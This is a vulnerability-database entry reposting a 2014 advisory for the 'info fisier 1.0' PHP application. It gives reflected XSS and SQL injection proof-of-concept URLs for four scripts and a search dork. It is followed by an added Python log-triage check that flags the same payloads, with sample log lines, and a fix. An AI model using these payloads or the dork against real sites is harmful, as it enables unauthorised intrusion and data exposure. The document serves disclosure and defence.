info fisier 1.0 - Multiple Vulnerabilities

2014-07-01T00:00:00
ID SSV:67293
Type seebug
Reporter Knownsec
Modified 2014-07-01T00:00:00

Description

################################################################################################
# [+] Author : kaozc9                                                                          #
# [+] Email  : kaozc9@gmail.com                                                                #
# [+] Site   : www.paradisextem.co.cc                                                          #
# [+] Team   : ParadisexTeam                                                                   #
# [+] Dork   : Powered by Info Fisier.                                                         #
################################################################################################
#=========================================XSS==================================================#
#                                                                                              #
# Affected Files:                                                                              #
#               http://server/path/search.php                                                  #
#               http://server/path/uploads.php                                                 #
#                                                                                              #
# POC:                                                                                         #
#     http://server/path/search.php?key=<script>alert(12345);</script>                         #
#     http://server/path/uploads.php?p=<script>alert(12345);</script>                          #
#=========================================SQL==================================================#
#                                                                                              #
# Affected Files:                                                                              #
#               http://server/path/file.php                                                    #
#               http://server/path/cut.php                                                     #
#                                                                                              #
# POC:                                                                                         #
#     http://server/path/file.php?id=-1 union select 1,@@version,3,4,5,6,7,8,9,10,11           #
#     http://server/path/cut.php?id=-1 union select 1,@@version,3,4,5,6,7,8,9,10,11            #
#                                                                                              #
################################################################################################
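
Added example (not part of the original advisory or the Info Fisier code): a log-triage check for the four script/parameter pairs listed above, flagging any `id` on file.php or cut.php that is not a plain integer and any `key` or `p` value on search.php or uploads.php that carries markup. The combined access-log format, the function name `classify` and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script -> parameter pairs taken from the advisory above.
INT_PARAMS = {"file.php": "id", "cut.php": "id"}          # expected: plain integer
TEXT_PARAMS = {"search.php": "key", "uploads.php": "p"}   # expected: no markup
# Request line of a common/combined access-log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

def classify(log_line):
    """Return (kind, script, param, decoded_value) findings for one log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    # parse_qs percent-decodes values, so encoded payloads are compared in clear.
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    if script in INT_PARAMS:
        name = INT_PARAMS[script]
        for value in params.get(name, []):
            # Allow-list: anything other than ASCII digits is unexpected here.
            if not re.fullmatch(r"[0-9]+", value):
                findings.append(("non-integer-id", script, name, value))
    if script in TEXT_PARAMS:
        name = TEXT_PARAMS[script]
        for value in params.get(name, []):
            # Triage heuristic: angle brackets in a search/page parameter.
            if re.search(r"[<>]", value):
                findings.append(("markup-in-param", script, name, value))
    return findings

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2014:10:00:00 +0000] "GET /path/file.php?id=42 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jul/2014:10:00:05 +0000] "GET /path/cut.php?id=-1%20union%20select%201,@@version,3 HTTP/1.1" 200 812',
    '192.0.2.11 - - [01/Jul/2014:10:00:09 +0000] "GET /path/search.php?key=%3Cscript%3Ealert(12345)%3B%3C/script%3E HTTP/1.1" 200 900',
    '192.0.2.12 - - [01/Jul/2014:10:00:12 +0000] "GET /path/search.php?key=report+2014 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for finding in classify(line):
            print(finding)
```

The same two rules describe the server-side fix: cast `id` to an integer (or bind it in a prepared statement) before it reaches the query, and HTML-encode `key` and `p` when they are echoed into the page.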